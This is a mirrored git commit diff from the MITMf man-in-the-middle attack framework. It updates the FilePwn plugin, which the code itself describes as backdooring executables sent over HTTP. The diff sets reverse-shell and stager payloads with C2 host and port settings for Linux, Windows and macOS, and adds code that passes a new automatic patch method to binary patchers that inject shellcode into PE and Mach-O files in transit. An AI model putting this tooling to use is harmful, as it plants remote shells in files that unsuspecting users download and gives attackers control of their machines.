mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-29 19:28:29 -07:00
Updated FilePwn plugin with latest BDFProxy version
Removed exception handling in mitmf.py since I actually want a traceback
This commit is contained in:
byt3bl33d3r
parent
4dd497d8b9
commit
5e9158ce0a
5 changed files with 59 additions and 50 deletions
|
|
@ -363,6 +363,7 @@
|
||||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||||
|
|
||||||
CompressedFiles = True #True/False
|
CompressedFiles = True #True/False
|
||||||
|
|
||||||
[[[[LinuxIntelx86]]]]
|
[[[[LinuxIntelx86]]]]
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
HOST = 192.168.1.168 # The C2
|
HOST = 192.168.1.168 # The C2
|
||||||
|
|
@ -378,10 +379,12 @@
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
|
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||||
|
PATCH_METHOD = automatic
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 4444
|
PORT = 8443
|
||||||
SHELL = reverse_tcp_stager
|
SHELL = iat_reverse_tcp_stager_threaded
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = False
|
ZERO_CERT = False
|
||||||
PATCH_DLL = True
|
PATCH_DLL = True
|
||||||
|
|
@ -389,10 +392,12 @@
|
||||||
|
|
||||||
[[[[WindowsIntelx64]]]]
|
[[[[WindowsIntelx64]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
|
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||||
|
PATCH_METHOD = automatic
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 8088
|
PORT = 8088
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = iat_reverse_tcp_stager_threaded
|
||||||
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = True
|
ZERO_CERT = True
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||||
|
|
|
||||||
|
|
@ -1 +1 @@
|
||||||
Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19
|
Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
|
||||||
|
|
@ -1 +1 @@
|
||||||
Subproject commit e7a69e46c13f77c90300965a0897d13de6437f78
|
Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef
|
||||||
30
mitmf.py
30
mitmf.py
|
|
@ -149,26 +149,22 @@ print "[*] MITMf v%s online... initializing plugins" % mitmf_version
|
||||||
load = []
|
load = []
|
||||||
|
|
||||||
for p in plugins:
|
for p in plugins:
|
||||||
try:
|
|
||||||
|
|
||||||
if vars(args)[p.optname] is True:
|
if vars(args)[p.optname] is True:
|
||||||
print "|_ %s v%s" % (p.name, p.version)
|
print "|_ %s v%s" % (p.name, p.version)
|
||||||
if hasattr(p, 'tree_output') and p.tree_output:
|
if hasattr(p, 'tree_output') and p.tree_output:
|
||||||
for line in p.tree_output:
|
for line in p.tree_output:
|
||||||
print "| |_ %s" % line
|
print "| |_ %s" % line
|
||||||
p.tree_output.remove(line)
|
p.tree_output.remove(line)
|
||||||
|
|
||||||
if getattr(args, p.optname):
|
if getattr(args, p.optname):
|
||||||
p.initialize(args)
|
p.initialize(args)
|
||||||
load.append(p)
|
load.append(p)
|
||||||
|
|
||||||
if vars(args)[p.optname] is True:
|
if vars(args)[p.optname] is True:
|
||||||
if hasattr(p, 'tree_output') and p.tree_output:
|
if hasattr(p, 'tree_output') and p.tree_output:
|
||||||
for line in p.tree_output:
|
for line in p.tree_output:
|
||||||
print "| |_ %s" % line
|
print "| |_ %s" % line
|
||||||
|
|
||||||
except Exception:
|
|
||||||
print "[-] Error loading plugin %s: %s" % (p.name, PrintException())
|
|
||||||
|
|
||||||
#Plugins are ready to go, start MITMf
|
#Plugins are ready to go, start MITMf
|
||||||
if args.disproxy:
|
if args.disproxy:
|
||||||
|
|
|
||||||
|
|
@ -78,7 +78,7 @@ class FilePwn(Plugin):
|
||||||
optname = "filepwn"
|
optname = "filepwn"
|
||||||
desc = "Backdoor executables being sent over http using bdfactory"
|
desc = "Backdoor executables being sent over http using bdfactory"
|
||||||
implements = ["handleResponse"]
|
implements = ["handleResponse"]
|
||||||
tree_output = ["BDFProxy v0.2 online"]
|
tree_output = ["BDFProxy v0.3.2 online"]
|
||||||
version = "0.2"
|
version = "0.2"
|
||||||
has_opts = False
|
has_opts = False
|
||||||
|
|
||||||
|
|
@ -123,8 +123,6 @@ class FilePwn(Plugin):
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||||
|
|
||||||
self.output.append("BDFProxy by midnite_runr online")
|
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
def convert_to_Bool(self, aString):
|
||||||
if aString.lower() == 'true':
|
if aString.lower() == 'true':
|
||||||
return True
|
return True
|
||||||
|
|
@ -167,6 +165,10 @@ class FilePwn(Plugin):
|
||||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.WindowsIntelx64['SHELL'],
|
SHELL=self.WindowsIntelx64['SHELL'],
|
||||||
|
|
@ -178,6 +180,7 @@ class FilePwn(Plugin):
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||||
)
|
)
|
||||||
|
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
@ -193,6 +196,10 @@ class FilePwn(Plugin):
|
||||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.WindowsIntelx86['SHELL'],
|
SHELL=self.WindowsIntelx86['SHELL'],
|
||||||
|
|
@ -203,7 +210,8 @@ class FilePwn(Plugin):
|
||||||
IMAGE_TYPE=self.WindowsType,
|
IMAGE_TYPE=self.WindowsType,
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||||
)
|
)
|
||||||
|
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
@ -236,7 +244,7 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
targetFile.support_check()
|
targetFile.support_check()
|
||||||
|
|
||||||
|
|
@ -245,29 +253,29 @@ class FilePwn(Plugin):
|
||||||
if targetFile.FAT_FILE is True:
|
if targetFile.FAT_FILE is True:
|
||||||
if self.FatPriority == 'x86':
|
if self.FatPriority == 'x86':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif self.FatPriority == 'x64':
|
elif self.FatPriority == 'x64':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
|
@ -276,9 +284,9 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
|
@ -286,7 +294,7 @@ class FilePwn(Plugin):
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
self.patched.put(result)
|
self.patched.put(result)
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
@ -464,7 +472,7 @@ class FilePwn(Plugin):
|
||||||
patchCount = 0
|
patchCount = 0
|
||||||
|
|
||||||
wasPatched = False
|
wasPatched = False
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
for info in zippyfile.infolist():
|
||||||
print "[*] >>> Next file in zipfile:", info.filename
|
print "[*] >>> Next file in zipfile:", info.filename
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue